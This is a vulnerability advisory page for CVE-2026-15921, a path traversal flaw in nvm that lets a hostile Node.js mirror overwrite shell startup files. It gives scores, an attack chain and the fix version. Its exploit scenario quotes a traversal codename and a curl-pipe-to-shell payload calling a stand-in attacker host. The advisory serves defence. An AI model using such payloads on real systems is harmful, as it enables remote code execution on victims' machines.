Skip to main content

Node Version Manager CVE-2026-15921

LOW
Path Traversal (CWE-22)
2026-07-15 harborist
2.1
CVSS 4.0 · Vendor: harborist

Severity by source

Vendor (harborist) PRIMARY
2.1 LOW
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
5.3 MEDIUM

AC:H for required MITM or mirror compromise precondition; I:H because attacker-controlled content written to shell startup files yields deferred arbitrary code execution.

3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N
4.0 AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

Primary rating from Vendor (harborist).

CVSS VectorVendor: harborist

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
A
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jul 15, 2026 - 22:09 vuln.today
Analysis Generated
Jul 15, 2026 - 22:09 vuln.today

DescriptionCVE.org

Node Version Manager (nvm) is a POSIX-compliant shell function for managing multiple node.js versions. In versions 0.32.1 through 0.40.5, nvm ls-remote (and other commands that refresh remote LTS aliases, such as nvm install --lts) parse the node.js mirror's index.tab and use each release's LTS codename field as an alias filename without validating it. A malicious, compromised, or man-in-the-middled mirror can return an LTS codename containing path-traversal sequences such as ../../../.bashrc, causing nvm to write the associated version string to a path outside $NVM_DIR/alias. With the default layout ($NVM_DIR is ~/.nvm), this can create or overwrite files in the user's home directory, including shell startup files, which can lead to code execution in a later shell session. Exploitation requires the victim to use a hostile mirror -- via a compromised mirror or CDN, a network man-in-the-middle, or a maliciously configured NVM_NODEJS_ORG_MIRROR/NVM_IOJS_ORG_MIRROR -- and to run an affected command. Version 0.40.6 validates remote LTS codenames as safe alias filenames and rejects .. path components when writing alias files.

AnalysisAI

Path traversal in nvm versions 0.32.1 through 0.40.5 allows a hostile Node.js mirror to overwrite arbitrary files in the victim's home directory, including shell startup files, leading to code execution on the next shell session. The vulnerability exists in nvm ls-remote, nvm install --lts, and any other nvm command that refreshes remote LTS aliases by fetching and parsing a mirror's index.tab - the LTS codename field is used as an alias filename without sanitization, permitting sequences like ../../../.bashrc to escape $NVM_DIR/alias. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Compromise or MITM the victim's nvm mirror
Delivery
Inject path-traversal LTS codename and shell payload in index.tab
Exploit
Victim runs nvm ls-remote or install --lts
Execution
nvm writes attacker payload to ~/.bashrc
Persist
Victim opens new shell session
Impact
Injected commands execute as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires three simultaneous conditions: (1) The victim must be running nvm version 0.32.1 through 0.40.5. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Despite the 'RCE' tag, the CVSS 4.0 base score of 2.1 correctly reflects the mandatory attack preconditions: AT:P (attack prerequisites present) requires the victim's nvm to communicate with a hostile mirror - achieved via MITM, compromised mirror infrastructure, or a deliberately misconfigured `NVM_NODEJS_ORG_MIRROR`/`NVM_IOJS_ORG_MIRROR` environment variable. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker positioned as a MITM on the victim's network (or operating a compromised mirror the victim's `NVM_NODEJS_ORG_MIRROR` points to) serves a crafted `index.tab` in which the LTS codename column contains `../../../.bashrc` and the version column contains a shell command payload such as `$(curl attacker.com/shell.sh | sh) #`. When the victim runs `nvm install --lts` or `nvm ls-remote`, nvm writes that payload string to `~/.bashrc`. …
Remediation Upgrade to nvm version 0.40.6, which validates LTS codenames against a strict allowlist regex and rejects any alias containing `..` path components. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

CVE-2024-55591 CRITICAL POC
9.8 Jan 14

FortiOS and FortiProxy contain an authentication bypass via the Node.js websocket module allowing unauthenticated remote

CVE-2014-7205 CRITICAL POC
10.0 Oct 08

Eval injection vulnerability in the internals.batch function in lib/batch.js in the bassmaster plugin before 1.5.2 for t

CVE-2025-59528 CRITICAL POC
10.0 Sep 22

Flowise version 3.0.5 contains a remote code execution vulnerability in the CustomMCP node. The mcpServerConfig paramete

CVE-2017-14849 HIGH POC
7.5 Sep 28

Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was inc

CVE-2017-5941 CRITICAL POC
9.8 Feb 09

An issue was discovered in the node-serialize package 0.0.4 for Node.js. Rated critical severity (CVSS 9.8), this vulner

CVE-2014-3744 HIGH POC
7.5 Oct 23

Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary fi

CVE-2014-9566 HIGH POC
7.5 Mar 10

Multiple SQL injection vulnerabilities in the Manage Accounts page in the AccountManagement.asmx service in the Solarwin

CVE-2013-4660 MEDIUM POC
6.8 Jun 28

The JS-YAML module before 2.0.5 for Node.js parses input without properly considering the unsafe !!js/function tag, whic

CVE-2015-5688 MEDIUM POC
5.0 Sep 04

Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read

CVE-2026-45321 CRITICAL POC
9.6 May 12

Credential-harvesting malware compromised 84 versions of 42 TanStack npm packages on 2026-05-11 via chained GitHub Actio

CVE-2014-7192 CRITICAL POC
10.0 Dec 11

Eval injection vulnerability in index.js in the syntax-error package before 1.1.1 for Node.js 0.10.x, as used in IBM Rat

CVE-2013-4450 MEDIUM POC
5.0 Oct 21

The HTTP server in Node.js 0.10.x before 0.10.21 and 0.8.x before 0.8.26 allows remote attackers to cause a denial of se

Share

CVE-2026-15921 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy